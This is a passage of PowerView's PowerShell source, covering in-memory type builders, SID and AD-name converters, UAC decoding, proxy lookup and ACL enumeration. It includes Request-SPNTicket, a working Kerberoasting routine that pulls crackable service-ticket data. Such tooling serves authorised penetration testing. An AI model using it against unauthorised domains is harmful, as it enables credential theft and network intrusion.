[Parameter(ValueFromPipelineByPropertyName = $True)] [Switch] $SetLastError, [Parameter(Mandatory = $True)] [ValidateScript({($_ -is [Reflection.Emit.ModuleBuilder]) -or ($_ -is [Reflection.Assembly])})] $Module, [ValidateNotNull()] [String] $Namespace = '' ) BEGIN { $TypeHash = @{} } PROCESS { if ($Module -is [Reflection.Assembly]) { if ($Namespace) { $TypeHash[$DllName] = $Module.GetType("$Namespace.$DllName") } else { $TypeHash[$DllName] = $Module.GetType($DllName) } } else { # Define one type for each DLL if (!$TypeHash.ContainsKey($DllName)) { if ($Namespace) { $TypeHash[$DllName] = $Module.DefineType("$Namespace.$DllName", 'Public,BeforeFieldInit') } else { $TypeHash[$DllName] = $Module.DefineType($DllName, 'Public,BeforeFieldInit') } } $Method = $TypeHash[$DllName].DefineMethod( $FunctionName, 'Public,Static,PinvokeImpl', $ReturnType, $ParameterTypes) # Make each ByRef parameter an Out parameter $i = 1 ForEach($Parameter in $ParameterTypes) { if ($Parameter.IsByRef) { [void] $Method.DefineParameter($i, 'Out', $Null) } $i++ } $DllImport = [Runtime.InteropServices.DllImportAttribute] $SetLastErrorField = $DllImport.GetField('SetLastError') $CallingConventionField = $DllImport.GetField('CallingConvention') $CharsetField = $DllImport.GetField('CharSet') if ($SetLastError) { $SLEValue = $True } else { $SLEValue = $False } # Equivalent to C# version of [DllImport(DllName)] $Constructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor([String]) $DllImportAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($Constructor, $DllName, [Reflection.PropertyInfo[]] @(), [Object[]] @(), [Reflection.FieldInfo[]] @($SetLastErrorField, $CallingConventionField, $CharsetField), [Object[]] @($SLEValue, ([Runtime.InteropServices.CallingConvention] $NativeCallingConvention), ([Runtime.InteropServices.CharSet] $Charset))) $Method.SetCustomAttribute($DllImportAttribute) } } END { if ($Module -is [Reflection.Assembly]) { return $TypeHash } $ReturnTypes = @{} ForEach ($Key in $TypeHash.Keys) { $Type = $TypeHash[$Key].CreateType() $ReturnTypes[$Key] = $Type } return $ReturnTypes } } function psenum { <# .SYNOPSIS Creates an in-memory enumeration for use in your PowerShell session. Author: Matthew Graeber (@mattifestation) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None .DESCRIPTION The 'psenum' function facilitates the creation of enums entirely in memory using as close to a "C style" as PowerShell will allow. .PARAMETER Module The in-memory module that will host the enum. Use New-InMemoryModule to define an in-memory module. .PARAMETER FullName The fully-qualified name of the enum. .PARAMETER Type The type of each enum element. .PARAMETER EnumElements A hashtable of enum elements. .PARAMETER Bitfield Specifies that the enum should be treated as a bitfield. .EXAMPLE $Mod = New-InMemoryModule -ModuleName Win32 $ImageSubsystem = psenum $Mod PE.IMAGE_SUBSYSTEM UInt16 @{ UNKNOWN = 0 NATIVE = 1 # Image doesn't require a subsystem. WINDOWS_GUI = 2 # Image runs in the Windows GUI subsystem. WINDOWS_CUI = 3 # Image runs in the Windows character subsystem. OS2_CUI = 5 # Image runs in the OS/2 character subsystem. POSIX_CUI = 7 # Image runs in the Posix character subsystem. NATIVE_WINDOWS = 8 # Image is a native Win9x driver. WINDOWS_CE_GUI = 9 # Image runs in the Windows CE subsystem. EFI_APPLICATION = 10 EFI_BOOT_SERVICE_DRIVER = 11 EFI_RUNTIME_DRIVER = 12 EFI_ROM = 13 XBOX = 14 WINDOWS_BOOT_APPLICATION = 16 } .NOTES PowerShell purists may disagree with the naming of this function but again, this was developed in such a way so as to emulate a "C style" definition as closely as possible. Sorry, I'm not going to name it New-Enum. :P #> [OutputType([Type])] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateScript({($_ -is [Reflection.Emit.ModuleBuilder]) -or ($_ -is [Reflection.Assembly])})] $Module, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $FullName, [Parameter(Position = 2, Mandatory = $True)] [Type] $Type, [Parameter(Position = 3, Mandatory = $True)] [ValidateNotNullOrEmpty()] [Hashtable] $EnumElements, [Switch] $Bitfield ) if ($Module -is [Reflection.Assembly]) { return ($Module.GetType($FullName)) } $EnumType = $Type -as [Type] $EnumBuilder = $Module.DefineEnum($FullName, 'Public', $EnumType) if ($Bitfield) { $FlagsConstructor = [FlagsAttribute].GetConstructor(@()) $FlagsCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($FlagsConstructor, @()) $EnumBuilder.SetCustomAttribute($FlagsCustomAttribute) } ForEach ($Key in $EnumElements.Keys) { # Apply the specified enum type to each element $Null = $EnumBuilder.DefineLiteral($Key, $EnumElements[$Key] -as $EnumType) } $EnumBuilder.CreateType() } # A helper function used to reduce typing while defining struct # fields. function field { Param ( [Parameter(Position = 0, Mandatory = $True)] [UInt16] $Position, [Parameter(Position = 1, Mandatory = $True)] [Type] $Type, [Parameter(Position = 2)] [UInt16] $Offset, [Object[]] $MarshalAs ) @{ Position = $Position Type = $Type -as [Type] Offset = $Offset MarshalAs = $MarshalAs } } function struct { <# .SYNOPSIS Creates an in-memory struct for use in your PowerShell session. Author: Matthew Graeber (@mattifestation) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: field .DESCRIPTION The 'struct' function facilitates the creation of structs entirely in memory using as close to a "C style" as PowerShell will allow. Struct fields are specified using a hashtable where each field of the struct is comprosed of the order in which it should be defined, its .NET type, and optionally, its offset and special marshaling attributes. One of the features of 'struct' is that after your struct is defined, it will come with a built-in GetSize method as well as an explicit converter so that you can easily cast an IntPtr to the struct without relying upon calling SizeOf and/or PtrToStructure in the Marshal class. .PARAMETER Module The in-memory module that will host the struct. Use New-InMemoryModule to define an in-memory module. .PARAMETER FullName The fully-qualified name of the struct. .PARAMETER StructFields A hashtable of fields. Use the 'field' helper function to ease defining each field. .PARAMETER PackingSize Specifies the memory alignment of fields. .PARAMETER ExplicitLayout Indicates that an explicit offset for each field will be specified. .EXAMPLE $Mod = New-InMemoryModule -ModuleName Win32 $ImageDosSignature = psenum $Mod PE.IMAGE_DOS_SIGNATURE UInt16 @{ DOS_SIGNATURE = 0x5A4D OS2_SIGNATURE = 0x454E OS2_SIGNATURE_LE = 0x454C VXD_SIGNATURE = 0x454C } $ImageDosHeader = struct $Mod PE.IMAGE_DOS_HEADER @{ e_magic = field 0 $ImageDosSignature e_cblp = field 1 UInt16 e_cp = field 2 UInt16 e_crlc = field 3 UInt16 e_cparhdr = field 4 UInt16 e_minalloc = field 5 UInt16 e_maxalloc = field 6 UInt16 e_ss = field 7 UInt16 e_sp = field 8 UInt16 e_csum = field 9 UInt16 e_ip = field 10 UInt16 e_cs = field 11 UInt16 e_lfarlc = field 12 UInt16 e_ovno = field 13 UInt16 e_res = field 14 UInt16[] -MarshalAs @('ByValArray', 4) e_oemid = field 15 UInt16 e_oeminfo = field 16 UInt16 e_res2 = field 17 UInt16[] -MarshalAs @('ByValArray', 10) e_lfanew = field 18 Int32 } # Example of using an explicit layout in order to create a union. $TestUnion = struct $Mod TestUnion @{ field1 = field 0 UInt32 0 field2 = field 1 IntPtr 0 } -ExplicitLayout .NOTES PowerShell purists may disagree with the naming of this function but again, this was developed in such a way so as to emulate a "C style" definition as closely as possible. Sorry, I'm not going to name it New-Struct. :P #> [OutputType([Type])] Param ( [Parameter(Position = 1, Mandatory = $True)] [ValidateScript({($_ -is [Reflection.Emit.ModuleBuilder]) -or ($_ -is [Reflection.Assembly])})] $Module, [Parameter(Position = 2, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $FullName, [Parameter(Position = 3, Mandatory = $True)] [ValidateNotNullOrEmpty()] [Hashtable] $StructFields, [Reflection.Emit.PackingSize] $PackingSize = [Reflection.Emit.PackingSize]::Unspecified, [Switch] $ExplicitLayout ) if ($Module -is [Reflection.Assembly]) { return ($Module.GetType($FullName)) } [Reflection.TypeAttributes] $StructAttributes = 'AnsiClass, Class, Public, Sealed, BeforeFieldInit' if ($ExplicitLayout) { $StructAttributes = $StructAttributes -bor [Reflection.TypeAttributes]::ExplicitLayout } else { $StructAttributes = $StructAttributes -bor [Reflection.TypeAttributes]::SequentialLayout } $StructBuilder = $Module.DefineType($FullName, $StructAttributes, [ValueType], $PackingSize) $ConstructorInfo = [Runtime.InteropServices.MarshalAsAttribute].GetConstructors()[0] $SizeConst = @([Runtime.InteropServices.MarshalAsAttribute].GetField('SizeConst')) $Fields = New-Object Hashtable[]($StructFields.Count) # Sort each field according to the orders specified # Unfortunately, PSv2 doesn't have the luxury of the # hashtable [Ordered] accelerator. ForEach ($Field in $StructFields.Keys) { $Index = $StructFields[$Field]['Position'] $Fields[$Index] = @{FieldName = $Field; Properties = $StructFields[$Field]} } ForEach ($Field in $Fields) { $FieldName = $Field['FieldName'] $FieldProp = $Field['Properties'] $Offset = $FieldProp['Offset'] $Type = $FieldProp['Type'] $MarshalAs = $FieldProp['MarshalAs'] $NewField = $StructBuilder.DefineField($FieldName, $Type, 'Public') if ($MarshalAs) { $UnmanagedType = $MarshalAs[0] -as ([Runtime.InteropServices.UnmanagedType]) if ($MarshalAs[1]) { $Size = $MarshalAs[1] $AttribBuilder = New-Object Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $UnmanagedType, $SizeConst, @($Size)) } else { $AttribBuilder = New-Object Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, [Object[]] @($UnmanagedType)) } $NewField.SetCustomAttribute($AttribBuilder) } if ($ExplicitLayout) { $NewField.SetOffset($Offset) } } # Make the struct aware of its own size. # No more having to call [Runtime.InteropServices.Marshal]::SizeOf! $SizeMethod = $StructBuilder.DefineMethod('GetSize', 'Public, Static', [Int], [Type[]] @()) $ILGenerator = $SizeMethod.GetILGenerator() # Thanks for the help, Jason Shirk! $ILGenerator.Emit([Reflection.Emit.OpCodes]::Ldtoken, $StructBuilder) $ILGenerator.Emit([Reflection.Emit.OpCodes]::Call, [Type].GetMethod('GetTypeFromHandle')) $ILGenerator.Emit([Reflection.Emit.OpCodes]::Call, [Runtime.InteropServices.Marshal].GetMethod('SizeOf', [Type[]] @([Type]))) $ILGenerator.Emit([Reflection.Emit.OpCodes]::Ret) # Allow for explicit casting from an IntPtr # No more having to call [Runtime.InteropServices.Marshal]::PtrToStructure! $ImplicitConverter = $StructBuilder.DefineMethod('op_Implicit', 'PrivateScope, Public, Static, HideBySig, SpecialName', $StructBuilder, [Type[]] @([IntPtr])) $ILGenerator2 = $ImplicitConverter.GetILGenerator() $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Nop) $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Ldarg_0) $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Ldtoken, $StructBuilder) $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Call, [Type].GetMethod('GetTypeFromHandle')) $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Call, [Runtime.InteropServices.Marshal].GetMethod('PtrToStructure', [Type[]] @([IntPtr], [Type]))) $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Unbox_Any, $StructBuilder) $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Ret) $StructBuilder.CreateType() } ######################################################## # # Misc. helpers # ######################################################## filter Get-IniContent { <# .SYNOPSIS This helper parses an .ini file into a proper PowerShell object. Author: 'The Scripting Guys' Link: https://blogs.technet.microsoft.com/heyscriptingguy/2011/08/20/use-powershell-to-work-with-any-ini-file/ .LINK https://blogs.technet.microsoft.com/heyscriptingguy/2011/08/20/use-powershell-to-work-with-any-ini-file/ #> [CmdletBinding()] Param( [Parameter(Mandatory=$True, ValueFromPipeline=$True, ValueFromPipelineByPropertyName=$True)] [Alias('FullName')] [ValidateScript({ Test-Path -Path $_ })] [String[]] $Path ) ForEach($TargetPath in $Path) { $IniObject = @{} Switch -Regex -File $TargetPath { "^\[(.+)\]" # Section { $Section = $matches[1].Trim() $IniObject[$Section] = @{} $CommentCount = 0 } "^(;.*)$" # Comment { $Value = $matches[1].Trim() $CommentCount = $CommentCount + 1 $Name = 'Comment' + $CommentCount $IniObject[$Section][$Name] = $Value } "(.+?)\s*=(.*)" # Key { $Name, $Value = $matches[1..2] $Name = $Name.Trim() $Values = $Value.split(',') | ForEach-Object {$_.Trim()} if($Values -isnot [System.Array]) {$Values = @($Values)} $IniObject[$Section][$Name] = $Values } } $IniObject } } filter Export-PowerViewCSV { <# .SYNOPSIS This helper exports an -InputObject to a .csv in a thread-safe manner using a mutex. This is so the various multi-threaded functions in PowerView has a thread-safe way to export output to the same file. Based partially on Dmitry Sotnikov's Export-CSV code at http://poshcode.org/1590 .LINK http://poshcode.org/1590 http://dmitrysotnikov.wordpress.com/2010/01/19/Export-Csv-append/ #> Param( [Parameter(Mandatory=$True, ValueFromPipeline=$True, ValueFromPipelineByPropertyName=$True)] [System.Management.Automation.PSObject[]] $InputObject, [Parameter(Mandatory=$True, Position=0)] [String] [ValidateNotNullOrEmpty()] $OutFile ) $ObjectCSV = $InputObject | ConvertTo-Csv -NoTypeInformation # mutex so threaded code doesn't stomp on the output file $Mutex = New-Object System.Threading.Mutex $False,'CSVMutex'; $Null = $Mutex.WaitOne() if (Test-Path -Path $OutFile) { # hack to skip the first line of output if the file already exists $ObjectCSV | ForEach-Object { $Start=$True }{ if ($Start) {$Start=$False} else {$_} } | Out-File -Encoding 'ASCII' -Append -FilePath $OutFile } else { $ObjectCSV | Out-File -Encoding 'ASCII' -Append -FilePath $OutFile } $Mutex.ReleaseMutex() } filter Get-IPAddress { <# .SYNOPSIS Resolves a given hostename to its associated IPv4 address. If no hostname is provided, it defaults to returning the IP address of the localhost. .EXAMPLE PS C:\> Get-IPAddress -ComputerName SERVER Return the IPv4 address of 'SERVER' .EXAMPLE PS C:\> Get-Content .\hostnames.txt | Get-IPAddress Get the IP addresses of all hostnames in an input file. #> [CmdletBinding()] param( [Parameter(Position=0, ValueFromPipeline=$True)] [Alias('HostName')] [String] $ComputerName = $Env:ComputerName ) try { # extract the computer name from whatever object was passed on the pipeline $Computer = $ComputerName | Get-NameField # get the IP resolution of this specified hostname @(([Net.Dns]::GetHostEntry($Computer)).AddressList) | ForEach-Object { if ($_.AddressFamily -eq 'InterNetwork') { $Out = New-Object PSObject $Out | Add-Member Noteproperty 'ComputerName' $Computer $Out | Add-Member Noteproperty 'IPAddress' $_.IPAddressToString $Out } } } catch { Write-Verbose -Message 'Could not resolve host to an IP Address.' } } filter Convert-NameToSid { <# .SYNOPSIS Converts a given user/group name to a security identifier (SID). .PARAMETER ObjectName The user/group name to convert, can be 'user' or 'DOMAIN\user' format. .PARAMETER Domain Specific domain for the given user account, defaults to the current domain. .EXAMPLE PS C:\> Convert-NameToSid 'DEV\dfm' #> [CmdletBinding()] param( [Parameter(Mandatory=$True, ValueFromPipeline=$True)] [String] [Alias('Name')] $ObjectName, [String] $Domain ) $ObjectName = $ObjectName -Replace "/","\" if($ObjectName.Contains("\")) { # if we get a DOMAIN\user format, auto convert it $Domain = $ObjectName.Split("\")[0] $ObjectName = $ObjectName.Split("\")[1] } elseif(-not $Domain) { $Domain = (Get-NetDomain).Name } try { $Obj = (New-Object System.Security.Principal.NTAccount($Domain, $ObjectName)) $SID = $Obj.Translate([System.Security.Principal.SecurityIdentifier]).Value $Out = New-Object PSObject $Out | Add-Member Noteproperty 'ObjectName' $ObjectName $Out | Add-Member Noteproperty 'SID' $SID $Out } catch { Write-Verbose "Invalid object/name: $Domain\$ObjectName" $Null } } filter Convert-SidToName { <# .SYNOPSIS Converts a security identifier (SID) to a group/user name. .PARAMETER SID The SID to convert. .EXAMPLE PS C:\> Convert-SidToName S-1-5-21-2620891829-2411261497-1773853088-1105 #> [CmdletBinding()] param( [Parameter(Mandatory=$True, ValueFromPipeline=$True)] [String] [ValidatePattern('^S-1-.*')] $SID ) try { $SID2 = $SID.trim('*') # try to resolve any built-in SIDs first # from https://support.microsoft.com/en-us/kb/243330 Switch ($SID2) { 'S-1-0' { 'Null Authority' } 'S-1-0-0' { 'Nobody' } 'S-1-1' { 'World Authority' } 'S-1-1-0' { 'Everyone' } 'S-1-2' { 'Local Authority' } 'S-1-2-0' { 'Local' } 'S-1-2-1' { 'Console Logon ' } 'S-1-3' { 'Creator Authority' } 'S-1-3-0' { 'Creator Owner' } 'S-1-3-1' { 'Creator Group' } 'S-1-3-2' { 'Creator Owner Server' } 'S-1-3-3' { 'Creator Group Server' } 'S-1-3-4' { 'Owner Rights' } 'S-1-4' { 'Non-unique Authority' } 'S-1-5' { 'NT Authority' } 'S-1-5-1' { 'Dialup' } 'S-1-5-2' { 'Network' } 'S-1-5-3' { 'Batch' } 'S-1-5-4' { 'Interactive' } 'S-1-5-6' { 'Service' } 'S-1-5-7' { 'Anonymous' } 'S-1-5-8' { 'Proxy' } 'S-1-5-9' { 'Enterprise Domain Controllers' } 'S-1-5-10' { 'Principal Self' } 'S-1-5-11' { 'Authenticated Users' } 'S-1-5-12' { 'Restricted Code' } 'S-1-5-13' { 'Terminal Server Users' } 'S-1-5-14' { 'Remote Interactive Logon' } 'S-1-5-15' { 'This Organization ' } 'S-1-5-17' { 'This Organization ' } 'S-1-5-18' { 'Local System' } 'S-1-5-19' { 'NT Authority' } 'S-1-5-20' { 'NT Authority' } 'S-1-5-80-0' { 'All Services ' } 'S-1-5-32-544' { 'BUILTIN\Administrators' } 'S-1-5-32-545' { 'BUILTIN\Users' } 'S-1-5-32-546' { 'BUILTIN\Guests' } 'S-1-5-32-547' { 'BUILTIN\Power Users' } 'S-1-5-32-548' { 'BUILTIN\Account Operators' } 'S-1-5-32-549' { 'BUILTIN\Server Operators' } 'S-1-5-32-550' { 'BUILTIN\Print Operators' } 'S-1-5-32-551' { 'BUILTIN\Backup Operators' } 'S-1-5-32-552' { 'BUILTIN\Replicators' } 'S-1-5-32-554' { 'BUILTIN\Pre-Windows 2000 Compatible Access' } 'S-1-5-32-555' { 'BUILTIN\Remote Desktop Users' } 'S-1-5-32-556' { 'BUILTIN\Network Configuration Operators' } 'S-1-5-32-557' { 'BUILTIN\Incoming Forest Trust Builders' } 'S-1-5-32-558' { 'BUILTIN\Performance Monitor Users' } 'S-1-5-32-559' { 'BUILTIN\Performance Log Users' } 'S-1-5-32-560' { 'BUILTIN\Windows Authorization Access Group' } 'S-1-5-32-561' { 'BUILTIN\Terminal Server License Servers' } 'S-1-5-32-562' { 'BUILTIN\Distributed COM Users' } 'S-1-5-32-569' { 'BUILTIN\Cryptographic Operators' } 'S-1-5-32-573' { 'BUILTIN\Event Log Readers' } 'S-1-5-32-574' { 'BUILTIN\Certificate Service DCOM Access' } 'S-1-5-32-575' { 'BUILTIN\RDS Remote Access Servers' } 'S-1-5-32-576' { 'BUILTIN\RDS Endpoint Servers' } 'S-1-5-32-577' { 'BUILTIN\RDS Management Servers' } 'S-1-5-32-578' { 'BUILTIN\Hyper-V Administrators' } 'S-1-5-32-579' { 'BUILTIN\Access Control Assistance Operators' } 'S-1-5-32-580' { 'BUILTIN\Access Control Assistance Operators' } Default { $Obj = (New-Object System.Security.Principal.SecurityIdentifier($SID2)) $Obj.Translate( [System.Security.Principal.NTAccount]).Value } } } catch { Write-Verbose "Invalid SID: $SID" $SID } } filter Convert-ADName { <# .SYNOPSIS Converts user/group names from NT4 (DOMAIN\user) or domainSimple (user@domain.com) to canonical format (domain.com/Users/user) or NT4. Based on Bill Stewart's code from this article: http://windowsitpro.com/active-directory/translating-active-directory-object-names-between-formats .PARAMETER ObjectName The user/group name to convert. .PARAMETER InputType The InputType of the user/group name ("NT4","Simple","Canonical"). .PARAMETER OutputType The OutputType of the user/group name ("NT4","Simple","Canonical"). .EXAMPLE PS C:\> Convert-ADName -ObjectName "dev\dfm" Returns "dev.testlab.local/Users/Dave" .EXAMPLE PS C:\> Convert-SidToName "S-..." | Convert-ADName Returns the canonical name for the resolved SID. .LINK http://windowsitpro.com/active-directory/translating-active-directory-object-names-between-formats #> [CmdletBinding()] param( [Parameter(Mandatory=$True, ValueFromPipeline=$True)] [String] $ObjectName, [String] [ValidateSet("NT4","Simple","Canonical")] $InputType, [String] [ValidateSet("NT4","Simple","Canonical")] $OutputType ) $NameTypes = @{ 'Canonical' = 2 'NT4' = 3 'Simple' = 5 } if(-not $PSBoundParameters['InputType']) { if( ($ObjectName.split('/')).Count -eq 2 ) { $ObjectName = $ObjectName.replace('/', '\') } if($ObjectName -match "^[A-Za-z]+\\[A-Za-z ]+") { $InputType = 'NT4' } elseif($ObjectName -match "^[A-Za-z ]+@[A-Za-z\.]+") { $InputType = 'Simple' } elseif($ObjectName -match "^[A-Za-z\.]+/[A-Za-z]+/[A-Za-z/ ]+") { $InputType = 'Canonical' } else { Write-Warning "Can not identify InType for $ObjectName" return $ObjectName } } elseif($InputType -eq 'NT4') { $ObjectName = $ObjectName.replace('/', '\') } if(-not $PSBoundParameters['OutputType']) { $OutputType = Switch($InputType) { 'NT4' {'Canonical'} 'Simple' {'NT4'} 'Canonical' {'NT4'} } } # try to extract the domain from the given format $Domain = Switch($InputType) { 'NT4' { $ObjectName.split("\")[0] } 'Simple' { $ObjectName.split("@")[1] } 'Canonical' { $ObjectName.split("/")[0] } } # Accessor functions to simplify calls to NameTranslate function Invoke-Method([__ComObject] $Object, [String] $Method, $Parameters) { $Output = $Object.GetType().InvokeMember($Method, "InvokeMethod", $Null, $Object, $Parameters) if ( $Output ) { $Output } } function Set-Property([__ComObject] $Object, [String] $Property, $Parameters) { [Void] $Object.GetType().InvokeMember($Property, "SetProperty", $Null, $Object, $Parameters) } $Translate = New-Object -ComObject NameTranslate try { Invoke-Method $Translate "Init" (1, $Domain) } catch [System.Management.Automation.MethodInvocationException] { Write-Verbose "Error with translate init in Convert-ADName: $_" } Set-Property $Translate "ChaseReferral" (0x60) try { Invoke-Method $Translate "Set" ($NameTypes[$InputType], $ObjectName) (Invoke-Method $Translate "Get" ($NameTypes[$OutputType])) } catch [System.Management.Automation.MethodInvocationException] { Write-Verbose "Error with translate Set/Get in Convert-ADName: $_" } } function ConvertFrom-UACValue { <# .SYNOPSIS Converts a UAC int value to human readable form. .PARAMETER Value The int UAC value to convert. .PARAMETER ShowAll Show all UAC values, with a + indicating the value is currently set. .EXAMPLE PS C:\> ConvertFrom-UACValue -Value 66176 Convert the UAC value 66176 to human readable format. .EXAMPLE PS C:\> Get-NetUser jason | select useraccountcontrol | ConvertFrom-UACValue Convert the UAC value for 'jason' to human readable format. .EXAMPLE PS C:\> Get-NetUser jason | select useraccountcontrol | ConvertFrom-UACValue -ShowAll Convert the UAC value for 'jason' to human readable format, showing all possible UAC values. #> [CmdletBinding()] param( [Parameter(Mandatory=$True, ValueFromPipeline=$True)] $Value, [Switch] $ShowAll ) begin { # values from https://support.microsoft.com/en-us/kb/305144 $UACValues = New-Object System.Collections.Specialized.OrderedDictionary $UACValues.Add("SCRIPT", 1) $UACValues.Add("ACCOUNTDISABLE", 2) $UACValues.Add("HOMEDIR_REQUIRED", 8) $UACValues.Add("LOCKOUT", 16) $UACValues.Add("PASSWD_NOTREQD", 32) $UACValues.Add("PASSWD_CANT_CHANGE", 64) $UACValues.Add("ENCRYPTED_TEXT_PWD_ALLOWED", 128) $UACValues.Add("TEMP_DUPLICATE_ACCOUNT", 256) $UACValues.Add("NORMAL_ACCOUNT", 512) $UACValues.Add("INTERDOMAIN_TRUST_ACCOUNT", 2048) $UACValues.Add("WORKSTATION_TRUST_ACCOUNT", 4096) $UACValues.Add("SERVER_TRUST_ACCOUNT", 8192) $UACValues.Add("DONT_EXPIRE_PASSWORD", 65536) $UACValues.Add("MNS_LOGON_ACCOUNT", 131072) $UACValues.Add("SMARTCARD_REQUIRED", 262144) $UACValues.Add("TRUSTED_FOR_DELEGATION", 524288) $UACValues.Add("NOT_DELEGATED", 1048576) $UACValues.Add("USE_DES_KEY_ONLY", 2097152) $UACValues.Add("DONT_REQ_PREAUTH", 4194304) $UACValues.Add("PASSWORD_EXPIRED", 8388608) $UACValues.Add("TRUSTED_TO_AUTH_FOR_DELEGATION", 16777216) $UACValues.Add("PARTIAL_SECRETS_ACCOUNT", 67108864) } process { $ResultUACValues = New-Object System.Collections.Specialized.OrderedDictionary if($Value -is [Int]) { $IntValue = $Value } elseif ($Value -is [PSCustomObject]) { if($Value.useraccountcontrol) { $IntValue = $Value.useraccountcontrol } } else { Write-Warning "Invalid object input for -Value : $Value" return $Null } if($ShowAll) { foreach ($UACValue in $UACValues.GetEnumerator()) { if( ($IntValue -band $UACValue.Value) -eq $UACValue.Value) { $ResultUACValues.Add($UACValue.Name, "$($UACValue.Value)+") } else { $ResultUACValues.Add($UACValue.Name, "$($UACValue.Value)") } } } else { foreach ($UACValue in $UACValues.GetEnumerator()) { if( ($IntValue -band $UACValue.Value) -eq $UACValue.Value) { $ResultUACValues.Add($UACValue.Name, "$($UACValue.Value)") } } } $ResultUACValues } } filter Get-Proxy { <# .SYNOPSIS Enumerates the proxy server and WPAD conents for the current user. .PARAMETER ComputerName The computername to enumerate proxy settings on, defaults to local host. .EXAMPLE PS C:\> Get-Proxy Returns the current proxy settings. #> param( [Parameter(ValueFromPipeline=$True)] [ValidateNotNullOrEmpty()] [String] $ComputerName = $ENV:COMPUTERNAME ) try { $Reg = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('CurrentUser', $ComputerName) $RegKey = $Reg.OpenSubkey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings") $ProxyServer = $RegKey.GetValue('ProxyServer') $AutoConfigURL = $RegKey.GetValue('AutoConfigURL') $Wpad = "" if($AutoConfigURL -and ($AutoConfigURL -ne "")) { try { $Wpad = (New-Object Net.Webclient).DownloadString($AutoConfigURL) } catch { Write-Warning "Error connecting to AutoConfigURL : $AutoConfigURL" } } if($ProxyServer -or $AutoConfigUrl) { $Properties = @{ 'ProxyServer' = $ProxyServer 'AutoConfigURL' = $AutoConfigURL 'Wpad' = $Wpad } New-Object -TypeName PSObject -Property $Properties } else { Write-Warning "No proxy settings found for $ComputerName" } } catch { Write-Warning "Error enumerating proxy settings for $ComputerName : $_" } } function Request-SPNTicket { <# .SYNOPSIS Request the kerberos ticket for a specified service principal name (SPN). .PARAMETER SPN The service principal name to request the ticket for. Required. .PARAMETER EncPart Switch. Return the encrypted portion of the ticket (cipher). .EXAMPLE PS C:\> Request-SPNTicket -SPN "HTTP/web.testlab.local" Request a kerberos service ticket for the specified SPN. .EXAMPLE PS C:\> Request-SPNTicket -SPN "HTTP/web.testlab.local" -EncPart Request a kerberos service ticket for the specified SPN and return the encrypted portion of the ticket. .EXAMPLE PS C:\> "HTTP/web1.testlab.local","HTTP/web2.testlab.local" | Request-SPNTicket Request kerberos service tickets for all SPNs passed on the pipeline. .EXAMPLE PS C:\> Get-NetUser -SPN | Request-SPNTicket Request kerberos service tickets for all users with non-null SPNs. #> [CmdletBinding()] Param ( [Parameter(Mandatory=$True, ValueFromPipelineByPropertyName = $True)] [Alias('ServicePrincipalName')] [String[]] $SPN, [Alias('EncryptedPart')] [Switch] $EncPart ) begin { Add-Type -AssemblyName System.IdentityModel } process { ForEach($UserSPN in $SPN) { Write-Verbose "Requesting ticket for: $UserSPN" if (!$EncPart) { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $UserSPN } else { $Ticket = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $UserSPN $TicketByteStream = $Ticket.GetRequest() if ($TicketByteStream) { $TicketHexStream = [System.BitConverter]::ToString($TicketByteStream) -replace "-" [System.Collections.ArrayList]$Parts = ($TicketHexStream -replace '^(.*?)04820...(.*)','$2') -Split "A48201" $Parts.RemoveAt($Parts.Count - 1) $Parts -join "A48201" break } } } } } function Get-PathAcl { <# .SYNOPSIS Enumerates the ACL for a given file path. .PARAMETER Path The local/remote path to enumerate the ACLs for. .PARAMETER Recurse If any ACL results are groups, recurse and retrieve user membership. .EXAMPLE PS C:\> Get-PathAcl "\\SERVER\Share\" Returns ACLs for the given UNC share. #> [CmdletBinding()] param( [Parameter(Mandatory=$True, ValueFromPipeline=$True)] [String] $Path, [Switch] $Recurse ) begin { function Convert-FileRight { # From http://stackoverflow.com/questions/28029872/retrieving-security-descriptor-and-getting-number-for-filesystemrights [CmdletBinding()] param( [Int] $FSR ) $AccessMask = @{ [uint32]'0x80000000' = 'GenericRead' [uint32]'0x40000000' = 'GenericWrite' [uint32]'0x20000000' = 'GenericExecute' [uint32]'0x10000000' = 'GenericAll' [uint32]'0x02000000' = 'MaximumAllowed' [uint32]'0x01000000' = 'AccessSystemSecurity' [uint32]'0x00100000' = 'Synchronize' [uint32]'0x00080000' = 'WriteOwner' [uint32]'0x00040000' = 'WriteDAC' [uint32]'0x00020000' = 'ReadControl' [uint32]'0x00010000' = 'Delete' [uint32]'0x00000100' = 'WriteAttributes' [uint32]'0x00000080' = 'ReadAttributes' [uint32]'0x00000040' = 'DeleteChild' [uint32]'0x00000020' = 'Execute/Traverse' [uint32]'0x00000010' = 'WriteExtendedAttributes' [uint32]'0x00000008' = 'ReadExtendedAttributes' [uint32]'0x00000004' = 'AppendData/AddSubdirectory' [uint32]'0x00000002' = 'WriteData/AddFile' [uint32]'0x00000001' = 'ReadData/ListDirectory' } $SimplePermissions = @{ [uint32]'0x1f01ff' = 'FullControl' [uint32]'0x0301bf' = 'Modify' [uint32]'0x0200a9' = 'ReadAndExecute' [uint32]'0x02019f' = 'ReadAndWrite' [uint32]'0x020089' = 'Read' [uint32]'0x000116' = 'Write' } $Permissions = @() # get simple permission $Permissions += $SimplePermissions.Keys | % { if (($FSR -band $_) -eq $_) { $SimplePermissions[$_] $FSR = $FSR -band (-not $_) } } # get remaining extended permissions $Permissions += $AccessMask.Keys | ? { $FSR -band $_ } | % { $AccessMask[$_] } ($Permissions | ?{$_}) -join "," } } 